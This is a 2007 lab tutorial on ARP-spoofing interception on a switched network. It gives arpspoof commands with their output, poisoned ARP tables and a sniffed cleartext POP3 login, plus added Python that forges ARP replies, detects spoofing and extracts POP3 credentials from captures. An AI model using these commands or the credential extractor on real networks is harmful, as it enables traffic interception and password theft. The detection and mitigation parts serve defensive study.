Ghost Hawk
September 2007
Introduction
TCP/IP hijacking is one of the simplest, yet most powerful, attacks available to an attacker. Used properly, it
lets you sniff passwords and other information on a switched network. When an Ethernet network uses a hub,
every frame a PC sends to the hub is repeated out of all of its ports, so sniffing all the traffic on a hubbed
network is easy. What about sniffing on a switched network? A switch is more intelligent than a hub: it looks at
the destination MAC address of each frame it receives and forwards the frame only to the port where that address
was learned, according to its MAC address table. That makes sniffing on a switched network harder, because the
switch never sends you frames addressed to someone else.
What is TCP/IP Hijacking?
In TCP/IP hijacking the attacker sets up a machine on the network that tricks the other hosts into sending their
packets to it instead of to their intended destination. On wired networks this relies on spoofing, which is simply
pretending to be something you are not. The most common form of spoofing used for this is Address Resolution
Protocol (ARP) spoofing. Every host on an Ethernet network using TCP/IP has a unique IP address, but frames on the
wire are delivered by a second address, the media access control (MAC) address of the network card. To move
packets, each host keeps a table of IP addresses and their corresponding MAC addresses, the ARP table (also called
the ARP cache), which it fills by broadcasting "who has 192.168.5.1?" and trusting whatever reply comes back. ARP
has no authentication, and most hosts accept replies they never asked for, so when ARP spoofing an attacker simply
sends forged ARP replies that map someone else's IP address to the attacker's MAC address. The victims update
their tables and from then on send that traffic to the attacker, who can read it and pass it on.
Example of ARP Spoofing
In this example I will be using ARP spoofing between my laptop and desktop on my switched network.
Target IP Address: 192.168.5.46
Gateway IP Address: 192.168.5.1
My MAC Address: 00:16:D4:C7:B9:CD
The first thing to do is turn on IP forwarding on the Linux box, so that the packets it receives on behalf of the
victims are routed on to their real destination. If you skip this step the attacker's kernel drops the redirected
traffic, which turns the attack into a denial of service against the target instead of a sniff, and a target with
no working connection never logs in to anything you could capture.
bt ~ # echo 1 > /proc/sys/net/ipv4/ip_forward
On the target machine I opened a command prompt to look at the current ARP table. Note the entry for the gateway,
192.168.5.1, which is the one the attack will overwrite:
C:\Documents and Settings\travis>arp -a
Interface: 192.168.5.46 --- 0x3
  Internet Address      Physical Address      Type
  192.168.5.1           00-50-8b-cc-43-48     dynamic
  192.168.5.2           00-30-48-74-e9-cc     dynamic
  192.168.5.220         00-30-48-74-e8-dc     dynamic
C:\Documents and Settings\travis>
Now I switch to my Linux box and start arpspoof (part of the dsniff package) to poison that table. The -t option
names the host whose table you want to poison, and the last argument is the host you want to impersonate, so this
tells 192.168.5.46 that 192.168.5.1 lives at my MAC address:
bt ~ # arpspoof -t 192.168.5.46 192.168.5.1
0:16:d4:c7:b9:cd 0:1:6c:a7:3e:8b 0806 42: arp reply 192.168.5.1 is-at 0:16:d4:c7:b9:cd
0:16:d4:c7:b9:cd 0:1:6c:a7:3e:8b 0806 42: arp reply 192.168.5.1 is-at 0:16:d4:c7:b9:cd
0:16:d4:c7:b9:cd 0:1:6c:a7:3e:8b 0806 42: arp reply 192.168.5.1 is-at 0:16:d4:c7:b9:cd
Each line is one forged reply: source MAC 0:16:d4:c7:b9:cd (mine), destination MAC 0:1:6c:a7:3e:8b (the target),
ethertype 0806 (ARP), 42 bytes on the wire, saying "192.168.5.1 is-at 0:16:d4:c7:b9:cd", my MAC address. arpspoof
keeps repeating the reply so that the poisoned entry never ages out, so leave it running in its own terminal.
Now turn the command around in a second terminal, so that the gateway also sends the target's traffic through me.
With only one side poisoned you would see the target's outgoing packets but not the replies coming back to it.
bt ~ # arpspoof -t 192.168.5.1 192.168.5.46
0:16:d4:c7:b9:cd 0:50:8b:cc:43:48 0806 42: arp reply 192.168.5.46 is-at 0:16:d4:c7:b9:cd
0:16:d4:c7:b9:cd 0:50:8b:cc:43:48 0806 42: arp reply 192.168.5.46 is-at 0:16:d4:c7:b9:cd
Back on the target machine, the ARP table now looks like this:
C:\Documents and Settings\travis>arp -a
Interface: 192.168.5.46 --- 0x3
  Internet Address      Physical Address      Type
  192.168.5.1           00-16-d4-c7-b9-cd     dynamic
  192.168.5.2           00-30-48-74-e9-cc     dynamic
  192.168.5.6           00-16-d4-c7-b9-cd     dynamic
  192.168.5.51          00-11-0a-f8-ef-db     dynamic
  192.168.5.144         00-00-74-a5-8a-b3     dynamic
  192.168.5.220         00-30-48-74-e8-dc     dynamic
C:\Documents and Settings\travis>
The gateway, 192.168.5.1, now maps to my MAC address instead of 00-50-8b-cc-43-48, so everything the target sends
towards the internet arrives at my Linux box first and is forwarded on. The other entry with the same MAC,
192.168.5.6, is the Linux box's own address, which the table learned normally. Two IP addresses sharing one MAC
address in a table like this is exactly the sign a defender looks for.
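To make concrete what arpspoof is putting on the wire, and what the target's table does with it, here is an added example that is not part of the original write-up. It builds the same 42-byte Ethernet+ARP reply frames the arpspoof output above shows, parses them back, models the target's cache overwriting its gateway entry, and runs a simple detector over the frames that flags both a changed IP-to-MAC binding and one MAC claiming two IPs. The addresses are the ones from the write-up; treating 192.168.5.6 as the attacker's own IP is an assumption, and the "trusted" table a detector would compare against is something you would have to maintain yourself. Nothing is transmitted: putting these frames on the wire needs a raw packet socket and root, which is what arpspoof does for you.

```python
import socket
import struct
from collections import defaultdict

# Addresses from the write-up. ATTACKER_IP = 192.168.5.6 is an assumption:
# the poisoned table maps it to the attacker's MAC, so it is the Linux box.
ATTACKER_MAC = "00:16:d4:c7:b9:cd"
ATTACKER_IP = "192.168.5.6"
TARGET_MAC = "00:01:6c:a7:3e:8b"
TARGET_IP = "192.168.5.46"
GATEWAY_MAC = "00:50:8b:cc:43:48"
GATEWAY_IP = "192.168.5.1"

ETH_P_ARP = 0x0806
ARP_REPLY = 2
ARP_FMT = "!HHBBH6s4s6s4s"  # htype ptype hlen plen op sha spa tha tpa = 28 bytes


def mac_bytes(mac):
    """'00-16-d4-..', '0:16:d4:..' or '00:16:d4:..' -> 6 raw bytes."""
    return bytes(int(part, 16) for part in mac.replace("-", ":").split(":"))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """The frame arpspoof emits: 14-byte Ethernet header + 28-byte ARP reply,
    unicast to the victim, saying '<sender_ip> is-at <sender_mac>'."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, ARP_REPLY,  # Ethernet, IPv4
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """Decode an Ethernet frame; return None unless it carries ARP."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        return None
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return {"eth_dst": mac_str(dst), "eth_src": mac_str(src), "op": op,
            "sha": mac_str(sha), "spa": socket.inet_ntoa(spa),
            "tha": mac_str(tha), "tpa": socket.inet_ntoa(tpa)}


def apply_to_cache(cache, arp):
    """Model of the victim behaviour seen above: a reply for an IP that is
    already cached overwrites the entry, solicited or not."""
    if arp["op"] == ARP_REPLY and arp["spa"] in cache:
        cache[arp["spa"]] = arp["sha"]
    return cache


def detect_arp_spoofing(frames, trusted):
    """Alert on (1) a reply whose IP->MAC binding differs from the trusted table
    and (2) one MAC claiming more than one IP, the signature of a two-sided
    arpspoof run. 'trusted' is a mapping you maintain yourself."""
    alerts = []
    claimed = defaultdict(set)
    for frame in frames:
        arp = parse_arp(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            continue
        ip, mac = arp["spa"], arp["sha"]
        if ip in trusted and trusted[ip] != mac:
            alerts.append("%s claimed by %s, trusted %s" % (ip, mac, trusted[ip]))
        claimed[mac].add(ip)
        if len(claimed[mac]) > 1:
            alerts.append("%s claims %s" % (mac, sorted(claimed[mac])))
    return alerts


def demo():
    """Constructed sequence: one genuine gateway reply, then the forged replies
    from the two arpspoof commands. Returns the target's cache and the alerts."""
    frames = [
        build_arp_reply(GATEWAY_MAC, GATEWAY_IP, TARGET_MAC, TARGET_IP),
        build_arp_reply(ATTACKER_MAC, GATEWAY_IP, TARGET_MAC, TARGET_IP),
        build_arp_reply(ATTACKER_MAC, TARGET_IP, GATEWAY_MAC, GATEWAY_IP),
    ]
    victim_cache = {GATEWAY_IP: GATEWAY_MAC, "192.168.5.2": "00:30:48:74:e9:cc"}
    for frame in frames:
        arp = parse_arp(frame)
        if arp["tpa"] == TARGET_IP:  # only replies that reach the target's NIC
            apply_to_cache(victim_cache, arp)
    trusted = {GATEWAY_IP: GATEWAY_MAC, TARGET_IP: TARGET_MAC}
    return victim_cache, detect_arp_spoofing(frames, trusted)


if __name__ == "__main__":
    cache, alerts = demo()
    print("target cache after poisoning:", cache)
    for alert in alerts:
        print("ALERT:", alert)
```

The detector only works from a vantage point that sees the forged replies, i.e. on the victim itself or on a switch SPAN port, since arpspoof unicasts them to the victim rather than broadcasting. Static ARP entries on critical hosts, or dynamic ARP inspection on the switch, stop the overwrite rather than merely reporting it.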
Time to open up the sniffer. Use whichever sniffer you are most comfortable with; in this example I used
Wireshark. I ran Wireshark for a few minutes, then went back and looked at all the packets I had collected. The
main thing I am looking for right now is the POP3 username and password. I looked through the list and saw some
lines containing POP3, right-clicked one of the packets and chose Follow TCP Stream. What I saw was this:
+OK Hello there.
AUTH
-ERR Invalid command.
USER user@domain.com
+OK Password required.
PASS uwish
+OK logged in.
STAT
+OK 0 0
QUIT
+OK Bye-bye.
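The stream above is readable only because POP3 sends USER and PASS in cleartext; the same login over POP3S or after STLS would show up in Wireshark as TLS records with nothing to follow. As an added example that is not part of the original write-up, here is the kind of credential extraction a sniffer such as dsniff performs on a captured POP3 session. It walks a Follow TCP Stream transcript, tells server lines (+OK, -ERR, or a bare "+ " SASL continuation) from client lines, and records each USER/PASS pair together with whether the server accepted it. It also decodes AUTH PLAIN, the base64 form of the same cleartext, which the server in the capture above rejected but many servers accept. The first transcript is the one shown above; the second, with user "alice", is constructed to exercise the AUTH PLAIN path.

```python
import base64

# Constructed transcripts. The first is the POP3 session captured above; the
# second is made up so the SASL PLAIN path is exercised as well.
CAPTURE_USER_PASS = """+OK Hello there.
AUTH
-ERR Invalid command.
USER user@domain.com
+OK Password required.
PASS uwish
+OK logged in.
STAT
+OK 0 0
QUIT
+OK Bye-bye.
"""

CAPTURE_AUTH_PLAIN = (
    "+OK Hello there.\r\n"
    "AUTH PLAIN " + base64.b64encode(b"\0alice\0s3cret").decode() + "\r\n"
    "-ERR Authentication failed.\r\n"
    "AUTH PLAIN\r\n"          # no initial response: server sends "+ " first
    "+ \r\n"
    + base64.b64encode(b"\0alice\0s3cret!").decode() + "\r\n"
    "+OK logged in.\r\n"
)


def decode_sasl_plain(blob):
    """SASL PLAIN is base64 of 'authzid\\0authcid\\0password'; return (authcid, password)
    or None if the blob is not valid base64 or not three NUL-separated fields."""
    try:
        parts = base64.b64decode(blob, validate=True).split(b"\0")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if len(parts) != 3:
        return None
    return parts[1].decode("utf-8", "replace"), parts[2].decode("utf-8", "replace")


def extract_pop3_credentials(stream):
    """Walk a Follow TCP Stream transcript and return (user, password, accepted)
    tuples. Lines starting with +OK, -ERR or '+ ' are the server's; everything
    else is the client's. A login is recorded once the server answers it."""
    found = []
    user = None
    pending = None      # (user, password) sent, not yet answered by the server
    sasl_next = False   # the client's next line is the base64 PLAIN blob
    for raw in stream.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("+OK") or line.startswith("-ERR"):
            if pending:
                found.append(pending + (line.startswith("+OK"),))
                pending = None
            continue
        if line == "+" or line.startswith("+ "):
            continue        # SASL continuation prompt; the blob follows
        if sasl_next:
            sasl_next = False
            pending = decode_sasl_plain(line)
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            user = arg
        elif verb == "PASS" and user is not None:
            pending = (user, arg)
        elif verb == "AUTH" and arg.upper().startswith("PLAIN"):
            rest = arg.split(None, 1)
            if len(rest) == 2:
                pending = decode_sasl_plain(rest[1])  # initial response inline
            else:
                sasl_next = True
    return found


if __name__ == "__main__":
    for name, capture in (("USER/PASS", CAPTURE_USER_PASS), ("AUTH PLAIN", CAPTURE_AUTH_PLAIN)):
        for user, password, accepted in extract_pop3_credentials(capture):
            print("%s: %s / %s (%s)" % (name, user, password, "accepted" if accepted else "rejected"))
```

Rejected attempts are kept on purpose: a user who mistypes a password usually types a near-miss of the real one. APOP and CRAM-MD5 logins would not appear here because they send a digest instead of the password; those still leak the username and are crackable offline, but that is a different exercise.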